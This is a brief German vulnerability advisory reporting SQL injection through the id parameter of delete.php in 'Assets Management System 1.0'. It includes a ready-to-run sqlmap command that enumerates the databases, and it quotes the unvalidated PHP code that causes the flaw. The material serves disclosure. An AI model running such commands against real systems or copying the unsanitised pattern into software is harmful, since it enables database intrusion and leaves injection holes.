
Assets Management System 1.0 ist anfällig für SQL-Injection über den id-Parameter in delete.php.
Beschreibung
Assets Management System 1.0 ist anfällig für SQL-Injection über den id-Parameter in delete.php
PoC
sqlmap -u 'http://localhost/delete.php?id=4*' --cookie="PHPSESSID=SESSID" --dbms=MySQL --dbs --batch

Code-Review (delete.php)
<?php include 'core/init.php';
$id = $_GET['id'];
delete_data($con,$id);
header('location:home.php');
Es gibt keine Validierung oder Bereinigung der $id-Variable. Das bedeutet, dass jeder Wert, der von einem Benutzer als id-Parameter bereitgestellt wird, direkt in der SQL-Abfrage verwendet wird.